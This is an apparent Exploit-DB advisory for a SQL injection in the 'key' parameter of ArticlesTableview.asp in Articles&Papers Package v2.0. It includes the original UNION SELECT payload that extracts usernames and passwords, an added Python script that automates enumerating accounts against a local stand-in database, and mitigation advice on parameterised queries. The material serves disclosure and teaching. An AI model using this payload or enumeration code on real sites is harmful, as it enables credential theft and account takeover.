Vendor: T-Dreams (per the CPE and script page below)
Product: Articles&Papers Package
Submitted by: ajann
CVSS: 9 (HIGH)
Type: Remote SQL Injection
CWE: CWE-89 (SQL Injection)
Product Name: Articles&Papers Package
Affected Version From: v2.0
Affected Version To: v2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:t-dreams:articles_and_papers_package
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Published: 2006 (milw0rm, 2006-09-17)

Articles&Papers Package <= v2.0 (ArticlesTableview.asp) Remote SQL Injection Vulnerability

The 'key' parameter of ArticlesTableview.asp is concatenated into a SQL query without validation, so whatever is appended to it is executed by the database. The advisory's template is http://[target]/[path]/ArticlesTableview.asp?key='[SQL HERE]. The example payload supplies a value that matches no article (-1) and appends a UNION SELECT of fourteen columns, the same number the original query returns, with userpassword and username placed in the fifth and sixth positions so that they are rendered in the page where article fields would normally appear: ArticlesTableview.asp?key=-1%20union%20select%200,0,0,0,userpassword,username,0,0,0,0,0,0,0,0%20from%20articlesusers%20where%20userid=18. Note that userid is not a request parameter: it is a column of the articlesusers table referenced in the injected WHERE clause, and changing its value (1, 2, 3, ...) returns the credentials of each account in turn. Whether userpassword holds a plaintext password or a hash is not stated in the advisory. The unquoted -1 form works where key is compared as a number; where the value is placed inside a string literal, the attacker first closes the quote, as in the key=' template.

Mitigation:

Treat 'key' as data, never as SQL text: validate that it is a well-formed article identifier before the query is built, and pass it to the database through a parameterised command (in classic ASP, an ADODB.Command with parameters created by CreateParameter) instead of string concatenation. Escaping or "sanitising" the value alone is fragile, because the payload above contains no quote character and would pass a quote-stripping filter unchanged. No vendor patch exists for v2.0, so until the page is rewritten, access to ArticlesTableview.asp should be restricted.
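The following is an added example, not code from the advisory or from T-Dreams, that shows both halves of the entry above: the UNION SELECT payload extracting a row from articlesusers through the unsanitised lookup, and the parameterised lookup that defeats it. It assumes the vulnerable query has the shape SELECT * FROM articles WHERE id=<key> with fourteen result columns, and uses SQLite as a stand-in for the product's real backend; every table and column name other than articlesusers, userid, username and userpassword is invented for the example.

```python
import sqlite3

# Constructed stand-in for the application's database. The real product is
# classic ASP over ADO; SQLite is used here only so the example runs offline.
# All names except articlesusers/userid/username/userpassword are assumptions.
SCHEMA = """
CREATE TABLE articles (
    id INTEGER, title TEXT, abstract TEXT, body TEXT, c5 TEXT, c6 TEXT, c7 TEXT,
    c8 TEXT, c9 TEXT, c10 TEXT, c11 TEXT, c12 TEXT, c13 TEXT, c14 TEXT
);
CREATE TABLE articlesusers (userid INTEGER, username TEXT, userpassword TEXT);
INSERT INTO articles VALUES (1, 'Paper one', 'abstract', 'body',
    '', '', '', '', '', '', '', '', '', '');
INSERT INTO articlesusers VALUES (1, 'admin', 's3cret');
INSERT INTO articlesusers VALUES (18, 'editor', 'hunter2');
"""

# The advisory's payload (URL-decoded) with the userid left as a placeholder.
# Fourteen columns match the assumed width of SELECT * FROM articles.
INJECTED_KEY = ("-1 union select 0,0,0,0,userpassword,username,0,0,0,0,0,0,0,0 "
                "from articlesusers where userid={uid}")


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, key):
    """Assumed shape of the vulnerable page: Request("key") glued into the SQL."""
    sql = "SELECT * FROM articles WHERE id=" + key
    return conn.execute(sql).fetchall()


def safe_lookup(conn, key):
    """Hardened form: validate the identifier, then bind it as a parameter."""
    try:
        article_id = int(key)          # an article id is a number; reject anything else
    except ValueError:
        return []
    # With '?' the driver sends article_id as a value; it can never become SQL text.
    return conn.execute("SELECT * FROM articles WHERE id=?", (article_id,)).fetchall()


def dump_user(conn, uid):
    """Return (username, userpassword) for one userid via the UNION payload, or None."""
    rows = vulnerable_lookup(conn, INJECTED_KEY.format(uid=uid))
    if not rows:
        return None                    # id=-1 matches nothing and no such userid exists
    row = rows[0]                      # the only row is the UNION'd one
    return row[5], row[4]              # 6th column = username, 5th = userpassword


def enumerate_users(conn, start=1, stop=30):
    """Automates the advisory's 'change the UserID (1,2,3,4,5...)' step."""
    found = {}
    for uid in range(start, stop + 1):
        creds = dump_user(conn, uid)
        if creds is not None:
            found[uid] = creds
    return found


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup leaks:", enumerate_users(db))
    print("parameterised lookup returns:", safe_lookup(db, INJECTED_KEY.format(uid=18)))
```

Running the block prints the two accounts recovered through the concatenated query and an empty result for the same payload against the parameterised query. The int() check is defence in depth; the binding alone is what stops the injection, since the database receives the whole string as a value compared against id.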
Source (Exploit-DB raw data):

*******************************************************************************
# Title  :  Articles&Papers Package <=v2.0(ArticlesTableview.asp) Remote SQL Injection Vulnerability

# Author :   ajann

# Script Page : http://www.t-dreams.com

# Exploit;

*******************************************************************************

###http://[target]/[path]/ArticlesTableview.asp?key='[SQL HERE]

Example:
ArticlesTableview.asp?key=-1%20union%20select%200,0,0,0,userpassword,username,0,0,0,0,0,0,0,0%20from%20articlesusers%20where%20userid=18

Please change the UserID (1,2,3,4,5.....)

# ajann,Turkey
# ...
# I'm not [Turkish] Hacker!

# milw0rm.com [2006-09-17]